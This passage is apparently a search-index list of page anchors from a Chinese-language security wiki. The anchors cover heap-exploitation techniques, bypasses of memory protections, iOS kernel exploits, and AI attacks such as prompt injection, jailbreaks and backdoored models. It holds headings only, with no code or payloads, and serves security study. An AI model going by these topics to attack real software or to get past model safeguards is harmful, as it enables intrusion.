html#use-after-free","binary-exploitation/libc-heap/use-after-free/index.html#basic-information","binary-exploitation/libc-heap/use-after-free/index.html#first-fit-attack","binary-exploitation/libc-heap/use-after-free/first-fit.html#first-fit","binary-exploitation/libc-heap/use-after-free/first-fit.html#first-fit-1","binary-exploitation/libc-heap/use-after-free/first-fit.html#unsorted-bins","binary-exploitation/libc-heap/use-after-free/first-fit.html#fastbins","binary-exploitation/libc-hea
p/use-after-free/first-fit.html#-现代-glibc-考虑事项-tcache--226","binary-exploitation/libc-heap/use-after-free/first-fit.html#-使用首次适应制作重叠块的-uaf","binary-exploitation/libc-heap/use-after-free/first-fit.html#--缓解措施与加固","binary-exploitation/libc-heap/use-after-free/first-fit.html#其他参考与示例","binary-exploitation/libc-heap/double-free.html#double-free","binary-exploitation/libc-heap/double-free.html#基本信息","binary-exploitation/libc-heap/double-free.html#示例","binary-exploitation/libc-heap/double-free.html#参考","binary-exploitation/libc-heap/overwriting-a-freed-chunk.html#重写已释放的块","binary-exploitation/libc-heap/overwriting-a-freed-chunk.html#简单的使用后释放","binary-exploitation/libc-heap/overwriting-a-freed-chunk.html#双重释放","binary-exploitation/libc-heap/overwriting-a-freed-chunk.html#堆溢出","binary-exploitation/libc-heap/overwriting-a-freed-chunk.html#一偏移溢出","binary-exploitation/libc-heap/heap-overflow.html#heap-overflow","binary-exploitation/libc-heap/heap-overflow.html#基本信息","binary-exploitation/libc-heap/heap-overflow.html#栈溢出与堆溢出","binary-exploitation/libc-heap/heap-overflow.html#示例-libc","binary-exploitation/libc-heap/heap-overflow.html#示例-arm64","binary-exploitation/libc-heap/heap-overflow.html#其他示例","binary-exploitation/libc-heap/heap-overflow.html#真实世界示例cve-2025-40597--错误使用-__sprintf_chk","binary-exploitation/libc-heap/heap-overflow.html#references","binary-exploitation/libc-heap/unlink-attack.html#unlink-attack","binary-exploitation/libc-heap/unlink-attack.html#基本信息","binary-exploitation/libc-heap/unlink-attack.html#代码示例","binary-exploitation/libc-heap/unlink-attack.html#目标","binary-exploitation/libc-heap/unlink-attack.html#要求","binary-exploitation/libc-heap/unlink-attack.html#攻击","binary-exploitation/libc-heap/unlink-attack.html#参考","binary-exploitation/libc-heap/fast-bin-attack.html#fast-bin-attack","binary-exploitation/libc-heap/fast-bin-attack.html#基本信息","binary-exploitation/libc-heap/fast-bin-attack.html#示例","binary-exploitation/libc-heap/unsorted-bin-attack.html#unsorted-bi
n-attack","binary-exploitation/libc-heap/unsorted-bin-attack.html#基本信息","binary-exploitation/libc-heap/unsorted-bin-attack.html#写入是如何实际发生的","binary-exploitation/libc-heap/unsorted-bin-attack.html#现代限制glibc--233","binary-exploitation/libc-heap/unsorted-bin-attack.html#最小利用流程modern-glibc","binary-exploitation/libc-heap/unsorted-bin-attack.html#unsorted-bin-infoleak-attack","binary-exploitation/libc-heap/unsorted-bin-attack.html#参考与其他示例","binary-exploitation/libc-heap/unsorted-bin-attack.html#参考资料","binary-exploitation/libc-heap/large-bin-attack.html#large-bin-attack","binary-exploitation/libc-heap/large-bin-attack.html#basic-information","binary-exploitation/libc-heap/large-bin-attack.html#其他示例","binary-exploitation/libc-heap/tcache-bin-attack.html#tcache-bin-attack","binary-exploitation/libc-heap/tcache-bin-attack.html#basic-information","binary-exploitation/libc-heap/tcache-bin-attack.html#tcache-indexes-attack","binary-exploitation/libc-heap/tcache-bin-attack.html#examples","binary-exploitation/libc-heap/off-by-one-overflow.html#off-by-one-overflow","binary-exploitation/libc-heap/off-by-one-overflow.html#基本信息","binary-exploitation/libc-heap/off-by-one-overflow.html#代码示例","binary-exploitation/libc-heap/off-by-one-overflow.html#目标","binary-exploitation/libc-heap/off-by-one-overflow.html#要求","binary-exploitation/libc-heap/off-by-one-overflow.html#一般的越界攻击","binary-exploitation/libc-heap/off-by-one-overflow.html#越界空指针攻击","binary-exploitation/libc-heap/off-by-one-overflow.html#其他示例与参考","binary-exploitation/libc-heap/house-of-spirit.html#house-of-spirit","binary-exploitation/libc-heap/house-of-spirit.html#基本信息","binary-exploitation/libc-heap/house-of-spirit.html#代码","binary-exploitation/libc-heap/house-of-spirit.html#目标","binary-exploitation/libc-heap/house-of-spirit.html#要求","binary-exploitation/libc-heap/house-of-spirit.html#攻击","binary-exploitation/libc-heap/house-of-spirit.html#示例","binary-exploitation/libc-heap/house-of-spirit.html#参考","binary-exploitation/libc-heap/
house-of-lore.html#house-of-lore--small-bin-attack","binary-exploitation/libc-heap/house-of-lore.html#基本信息","binary-exploitation/libc-heap/house-of-lore.html#代码","binary-exploitation/libc-heap/house-of-lore.html#目标","binary-exploitation/libc-heap/house-of-lore.html#要求","binary-exploitation/libc-heap/house-of-lore.html#攻击","binary-exploitation/libc-heap/house-of-lore.html#参考","binary-exploitation/libc-heap/house-of-einherjar.html#house-of-einherjar","binary-exploitation/libc-heap/house-of-einherjar.html#基本信息","binary-exploitation/libc-heap/house-of-einherjar.html#代码","binary-exploitation/libc-heap/house-of-einherjar.html#目标","binary-exploitation/libc-heap/house-of-einherjar.html#要求","binary-exploitation/libc-heap/house-of-einherjar.html#攻击","binary-exploitation/libc-heap/house-of-einherjar.html#参考和其他示例","binary-exploitation/libc-heap/house-of-force.html#house-of-force","binary-exploitation/libc-heap/house-of-force.html#基本信息","binary-exploitation/libc-heap/house-of-force.html#代码","binary-exploitation/libc-heap/house-of-force.html#目标","binary-exploitation/libc-heap/house-of-force.html#要求","binary-exploitation/libc-heap/house-of-force.html#攻击","binary-exploitation/libc-heap/house-of-force.html#参考文献与其他示例","binary-exploitation/libc-heap/house-of-orange.html#house-of-orange","binary-exploitation/libc-heap/house-of-orange.html#基本信息","binary-exploitation/libc-heap/house-of-orange.html#代码","binary-exploitation/libc-heap/house-of-orange.html#目标","binary-exploitation/libc-heap/house-of-orange.html#要求","binary-exploitation/libc-heap/house-of-orange.html#背景","binary-exploitation/libc-heap/house-of-orange.html#攻击","binary-exploitation/libc-heap/house-of-orange.html#参考","binary-exploitation/libc-heap/house-of-rabbit.html#house-of-rabbit","binary-exploitation/libc-heap/house-of-rabbit.html#requirements","binary-exploitation/libc-heap/house-of-rabbit.html#goals","binary-exploitation/libc-heap/house-of-rabbit.html#steps-of-the-attack","binary-exploitation/libc-heap/house-of-rabbit.htm
l#poc-1-修改快速堆块的大小","binary-exploitation/libc-heap/house-of-rabbit.html#poc-2-修改-fd-指针","binary-exploitation/libc-heap/house-of-rabbit.html#总结","binary-exploitation/libc-heap/house-of-roman.html#house-of-roman","binary-exploitation/libc-heap/house-of-roman.html#基本信息","binary-exploitation/libc-heap/house-of-roman.html#代码","binary-exploitation/libc-heap/house-of-roman.html#目标","binary-exploitation/libc-heap/house-of-roman.html#要求","binary-exploitation/libc-heap/house-of-roman.html#攻击步骤","binary-exploitation/libc-heap/house-of-roman.html#第-1-部分快块块指向-__malloc_hook","binary-exploitation/libc-heap/house-of-roman.html#part-2-unsorted_bin-攻击","binary-exploitation/libc-heap/house-of-roman.html#第-3-步将-__malloc_hook-设置为-system","binary-exploitation/libc-heap/house-of-roman.html#参考","binary-exploitation/common-binary-protections-and-bypasses/index.html#常见的二进制利用保护与绕过","binary-exploitation/common-binary-protections-and-bypasses/index.html#启用核心文件","binary-exploitation/common-binary-protections-and-bypasses/index.html#启用核心转储生成","binary-exploitation/common-binary-protections-and-bypasses/index.html#使用-gdb-分析核心文件","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#aslr","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#基本信息","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#检查-aslr-状态","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#禁用-aslr","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#启用-aslr","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#重启后的持久性","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#绕过","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#32位暴力破解","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#64-位栈暴力破解","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#本地信息-procpidstat","binary-exploitation/common-binary
-protections-and-bypasses/aslr/index.html#拥有一个泄漏","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#ret2ret--ret2pop","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#vsyscall","binary-exploitation/common-binary-protections-and-bypasses/aslr/index.html#vdso","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.html#ret2plt","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.html#基本信息","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.html#其他示例与参考","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.html#ret2ret--reo2pop","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.html#ret2ret","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.html#ret2pop","binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.html#references","binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.html#cet--shadow-stack","binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.html#控制流强制技术-cet","binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.html#影子栈","binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.html#cet-和影子栈如何防止攻击","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#libc-protections","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#chunk-alignment-enforcement","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#security-benefits","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#pointer-mangling-on-fastbins-and-tcache","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#security-benefits-1","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#demangling-pointers-with-a-heap-leak","binary-exploit
ation/common-binary-protections-and-bypasses/libc-protections.html#algorithm-overview","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#pointer-guard","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#bypassing-pointer-guard-with-a-leak","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#references","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#内存标记扩展-mte","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#基本信息","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#内存标记扩展的工作原理","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#mte-指针标签","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#mte-内存标签","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#检查模式","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#同步","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#异步","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#混合","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#实现与检测示例","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#参考","binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.html#no-exec--nx","binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.html#基本信息","binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.html#绕过方法","binary-exploitation/common-binary-protections-and-bypasses/pie/index.html#pie","binary-exploitation/common-binary-protections-and-bypasses/pie/index.html#基本信息","binary-exploitation/common-binary-protections-and-bypasses/pie/index.htm
l#绕过方法","binary-exploitation/common-binary-protections-and-bypasses/pie/index.html#参考","binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.html#bf-地址在栈中","binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.html#暴力破解地址","binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.html#改进","binary-exploitation/common-binary-protections-and-bypasses/relro.html#relro","binary-exploitation/common-binary-protections-and-bypasses/relro.html#relro-1","binary-exploitation/common-binary-protections-and-bypasses/relro.html#partial-relro","binary-exploitation/common-binary-protections-and-bypasses/relro.html#full-relro","binary-exploitation/common-binary-protections-and-bypasses/relro.html#如何检查二进制文件的-relro-状态","binary-exploitation/common-binary-protections-and-bypasses/relro.html#在编译自己的代码时启用-relro","binary-exploitation/common-binary-protections-and-bypasses/relro.html#绕过技术","binary-exploitation/common-binary-protections-and-bypasses/relro.html#现实世界的绕过示例-2024-ctf---pwncollege-enlightened-","binary-exploitation/common-binary-protections-and-bypasses/relro.html#最近的研究与漏洞-2022-2025","binary-exploitation/common-binary-protections-and-bypasses/relro.html#参考文献","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/index.html#stack-canaries","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/index.html#stackguard-和-stackshield","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/index.html#stack-smash-protector-propolice--fstack-protector","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/index.html#长度","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/index.html#绕过","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/index.html#参考文献","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.html#bf-forked-
-threaded-stack-canaries","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.html#brute-force-canary","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.html#example-1","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.html#示例-2","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.html#线程","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.html#其他示例与参考","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.html#打印栈金丝雀","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.html#扩大打印的栈","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.html#任意读取","binary-exploitation/arbitrary-write-2-exec/index.html#arbitrary-write-2-exec","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#www2exec---sips-icc-profile-out-of-bounds-write-cve-2024-44236","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#概述","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#易受攻击的代码","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#利用步骤","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#快速-poc-生成器-python-3","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#yara-检测规则","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#影响","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#检测与缓解","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#参考","binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.html#www2exec---atexit-tls存储和其他混淆指针","binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.html#__atexit-结构","binary-exploitation/arbitrary
-write-2-exec/www2exec-atexit.html#link_map","binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.html#tls-storage-dtor_list-在--__run_exit_handlers--中的覆盖","binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.html#__run_exit_handlers--中的其他损坏指针","binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.html#www2exec---dtors--fini_array","binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.html#dtors","binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.html#fini_array","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#www2exec---gotplt","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#基本信息","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#got-全局偏移表","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#plt-过程链接表","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#获取执行","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#检查-got","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#got2exec","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#libc-got-条目","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#free2system","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#strlen2system","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#one-gadget","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#从堆滥用-got","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#保护","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#参考","binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.html#www2exec---__malloc_hook--__free_hook","binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.html#malloc-hook","binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.html#free-hook","binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.html#tcache-poisoning--safe-linking-glibc-232--233","bin
ary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.html#glibc--234中发生了什么变化","binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.html#参考文献","binary-exploitation/common-exploiting-problems.html#常见的利用问题","binary-exploitation/common-exploiting-problems.html#远程利用中的fd","binary-exploitation/common-exploiting-problems.html#socat--pty","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#windows-exploiting-basic-guide---oscp-lvl","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#开始安装-slmail-服务","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#重启-slmail-服务","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#非常基础的-python-利用模板","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#更改-immunity-debugger-字体","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#将进程附加到-immunity-debugger","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#发送漏洞利用并检查-eip-是否受到影响","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#创建一个模式以修改-eip","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#检查堆栈中的-shellcode-空间","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#检查坏字符","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#找到-jmp-esp-作为返回地址","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#创建-shellcode","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#改进-shellcode","binary-exploitation/ios-exploiting/index.html#ios-exploiting","binary-exploitation/ios-exploiting/index.html#ios-exploit-mitigations","binary-exploitation/ios-exploiting/index.html#old-kernel-heap-pre-ios-15--pre-a12-era","binary-exploitation/ios-exploiting/index.html#the-freelist","binary-exploitation/ios-exploiting/index.html#利用-freelist","binary-exploitation/ios-exploiting/index.html#heap-grooming--feng-shui","binary-exploitation/ios-exploiting/index.html#modern-kernel-heap-ios-15a12-socs","binary-exploitation/ios-exploitin
g/index.html#1-from-classic-kalloc-to-kalloc_type","binary-exploitation/ios-exploiting/index.html#2-slabs-and-per-cpu-caches","binary-exploitation/ios-exploiting/index.html#3-randomization-inside-zones","binary-exploitation/ios-exploiting/index.html#4-guarded-allocations","binary-exploitation/ios-exploiting/index.html#5-page-protection-layer-ppl-and-sptm","binary-exploitation/ios-exploiting/index.html#6-large-allocations","binary-exploitation/ios-exploiting/index.html#7-allocation-patterns-attackers-target","binary-exploitation/ios-exploiting/index.html#example-allocation-flow-in-modern-heap","binary-exploitation/ios-exploiting/index.html#comparison-table","binary-exploitation/ios-exploiting/index.html#old-physical-use-after-free-via-iosurface","binary-exploitation/ios-exploiting/index.html#ghidra-install-bindiff","binary-exploitation/ios-exploiting/index.html#using-bindiff-with-kernel-versions","binary-exploitation/ios-exploiting/index.html#finding-the-right-xnu-version","binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.html#cve-2021-30807-iomobileframebuffer-oob","binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.html#漏洞","binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.html#基本-poc","binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.html#leak-内核地址-poc","binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.html#参考资料","binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.html#cve-2021-30807-iomobileframebuffer-oob","binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.html#漏洞","binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.html#dos-poc","binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.html#arbitrary-read-poc-explained","binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.html#参考资料","binary-exploitation/ios-exploiting/ios-corellium.html#ios-如何连接到-corellium","binary-exploitation
/ios-exploiting/ios-corellium.html#prereqs","binary-exploitation/ios-exploiting/ios-corellium.html#connect-to-the-iphone-vm-from-localhost","binary-exploitation/ios-exploiting/ios-corellium.html#a--quick-connect无需-vpn","binary-exploitation/ios-exploiting/ios-corellium.html#b--vpn--直接-ssh","binary-exploitation/ios-exploiting/ios-corellium.html#上传并执行原生二进制","binary-exploitation/ios-exploiting/ios-corellium.html#21--上传","binary-exploitation/ios-exploiting/ios-corellium.html#上传并安装-ios-应用-ipa","binary-exploitation/ios-exploiting/ios-corellium.html#路径-a---web-ui-fastest","binary-exploitation/ios-exploiting/ios-corellium.html#路径-b---通过-corellium-agent-脚本化","binary-exploitation/ios-exploiting/ios-corellium.html#路径-c---non-jailbroken-proper-signing--sideloadly","binary-exploitation/ios-exploiting/ios-corellium.html#extras","binary-exploitation/ios-exploiting/ios-corellium.html#常见陷阱","binary-exploitation/ios-exploiting/ios-example-heap-exploit.html#ios-如何连接到-corellium","binary-exploitation/ios-exploiting/ios-example-heap-exploit.html#漏洞代码","binary-exploitation/ios-exploiting/ios-example-heap-exploit.html#exploit","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#ios-physical-use-after-free-via-iosurface","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#physical-use-after-free","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#memory-management-in-xnu","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#physical-use-after-free-1","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#iosurface-heap-spray","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#step-by-step-heap-spray-process","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#使用-iosurface-实现-kernel-readwrite","AI/index.html#ai在网络安全中的应用","AI/index.html#主要机器学习算法","AI/index.html#llm架构","AI/index.html#ai安全","AI/index.html#ai风险框架","AI/index.html#ai提示安全","AI/index.html#ai模型rce","AI/index.html#ai模型上下文协议","A
I/index.html#ai辅助模糊测试与自动化漏洞发现","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#ai-assisted-fuzzing--automated-vulnerability-discovery","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#概述","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#1-llm生成的种子输入","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#提示","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#2-语法演化模糊测试","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#3-基于代理的-pov漏洞证明生成","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#4-使用微调代码模型的定向模糊测试","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#5-ai引导的修补策略","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#51-超级补丁","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#52-推测补丁比率","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#整合所有内容","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#参考文献","AI/AI-Deep-Learning.html#深度学习","AI/AI-Deep-Learning.html#深度学习-1","AI/AI-Deep-Learning.html#神经网络","AI/AI-Deep-Learning.html#激活函数","AI/AI-Deep-Learning.html#反向传播","AI/AI-Deep-Learning.html#卷积神经网络cnns","AI/AI-Deep-Learning.html#定义cnn的示例","AI/AI-Deep-Learning.html#cnn-代码示例","AI/AI-Deep-Learning.html#cnn-代码训练示例","AI/AI-Deep-Learning.html#循环神经网络-rnns","AI/AI-Deep-Learning.html#长短期记忆-lstm-和门控循环单元-gru","AI/AI-Deep-Learning.html#llms-大型语言模型","AI/AI-Deep-Learning.html#变换器架构","AI/AI-Deep-Learning.html#扩散模型","AI/AI-MCP-Servers.html#mcp-服务器","AI/AI-MCP-Servers.html#什么是-mpc---模型上下文协议","AI/AI-MCP-Servers.html#基本-mcp-服务器","AI/AI-MCP-Servers.html#mcp-漏洞","AI/AI-MCP-Servers.html#通过直接-mcp-数据进行的-prompt-injection--跳行攻击--工具中毒","AI/AI-MCP-Servers.html#通过间接数据进行提示注入","AI/AI-MCP-Servers.html#通过mcp信任绕过进行持久代码执行cursor-ide--mcpoison","AI/AI-MCP-Servers.html#参考","AI/AI-Model-Data-Preparation-and-Evaluation.html#模型数据准备与评估","AI/AI-Model-Data-Preparation-and-Evaluation.html#数据收集","AI/AI-Model-Data-Preparation-and-Evaluation.html#数据清理","AI/AI-Model-Data-Preparation-and-Evaluation.html#数据清理示例","AI/AI-Model-Data-Preparation-and-
Evaluation.html#数据转换","AI/AI-Model-Data-Preparation-and-Evaluation.html#数据拆分","AI/AI-Model-Data-Preparation-and-Evaluation.html#模型评估","AI/AI-Model-Data-Preparation-and-Evaluation.html#准确率","AI/AI-Model-Data-Preparation-and-Evaluation.html#precision","AI/AI-Model-Data-Preparation-and-Evaluation.html#召回率敏感性","AI/AI-Model-Data-Preparation-and-Evaluation.html#f1-score","AI/AI-Model-Data-Preparation-and-Evaluation.html#roc-auc-接收者操作特征---曲线下面积","AI/AI-Model-Data-Preparation-and-Evaluation.html#特异性","AI/AI-Model-Data-Preparation-and-Evaluation.html#matthews-correlation-coefficient-mcc","AI/AI-Model-Data-Preparation-and-Evaluation.html#平均绝对误差-mae","AI/AI-Model-Data-Preparation-and-Evaluation.html#混淆矩阵","AI/AI-Models-RCE.html#models-rce","AI/AI-Models-RCE.html#加载模型到-rce","AI/AI-Models-RCE.html#--通过-torchload-调用-invokeai-rce-cve-2024-12029","AI/AI-Models-RCE.html#示例--创建恶意-pytorch-模型","AI/AI-Models-RCE.html#models-to-path-traversal","AI/AI-Models-RCE.html#深入探讨keras-keras-反序列化和小工具搜索","AI/AI-Models-RCE.html#参考文献","AI/AI-Prompts.html#ai-提示","AI/AI-Prompts.html#基本信息","AI/AI-Prompts.html#prompt-engineering","AI/AI-Prompts.html#prompt-attacks","AI/AI-Prompts.html#prompt-injection","AI/AI-Prompts.html#prompt-leaking","AI/AI-Prompts.html#jailbreak","AI/AI-Prompts.html#prompt-injection-via-direct-requests","AI/AI-Prompts.html#changing-the-rules--assertion-of-authority","AI/AI-Prompts.html#prompt-injection-via-context-manipulation","AI/AI-Prompts.html#storytelling--context-switching","AI/AI-Prompts.html#双重人格--role-play--dan--opposite-mode","AI/AI-Prompts.html#prompt-injection-via-text-alterations","AI/AI-Prompts.html#translation-trick","AI/AI-Prompts.html#拼写检查--语法更正作为利用方式","AI/AI-Prompts.html#summary--repetition-attacks","AI/AI-Prompts.html#编码与混淆格式","AI/AI-Prompts.html#indirect-exfiltration--prompt-leaking","AI/AI-Prompts.html#通过同义词或拼写错误进行混淆绕过过滤","AI/AI-Prompts.html#payload-splitting-step-by-step-injection","AI/AI-Prompts.html#third-party-or-indirect-prompt-injection","AI/AI-Prompts.htm
l#ide-code-assistants-context-attachment-indirect-injection-backdoor-generation","AI/AI-Prompts.html#code-injection-via-prompt","AI/AI-Prompts.html#tools","AI/AI-Prompts.html#prompt-waf-bypass","AI/AI-Prompts.html#using-prompt-injection-techniques","AI/AI-Prompts.html#token-confusion","AI/AI-Prompts.html#autocompleteeditor-prefix-seeding-moderation-bypass-in-ides","AI/AI-Prompts.html#direct-base-model-invocation-outside-guardrails","AI/AI-Prompts.html#prompt-injection-in-github-copilot-hidden-mark-up","AI/AI-Prompts.html#1-hiding-the-payload-with-the--tag","AI/AI-Prompts.html#2-re-creating-a-believable-chat-turn","AI/AI-Prompts.html#3-leveraging-copilots-tool-firewall","AI/AI-Prompts.html#3-利用-copilot-的工具防火墙","AI/AI-Prompts.html#4-minimal-diff-backdoor-for-code-review-stealth","AI/AI-Prompts.html#4-minimal-diff-backdoor-用于代码审查隐蔽","AI/AI-Prompts.html#5-full-attack-flow","AI/AI-Prompts.html#5-完整攻击流程","AI/AI-Prompts.html#detection--mitigation-ideas","AI/AI-Prompts.html#检测与缓解思路","AI/AI-Prompts.html#prompt-injection-in-github-copilot--yolo-mode-autoapprove","AI/AI-Prompts.html#端到端利用链","AI/AI-Prompts.html#one-liner-poc","AI/AI-Prompts.html#隐蔽技巧","AI/AI-Prompts.html#缓解措施","AI/AI-Prompts.html#参考资料","AI/AI-Risk-Frameworks.html#ai-风险","AI/AI-Risk-Frameworks.html#owasp-机器学习十大漏洞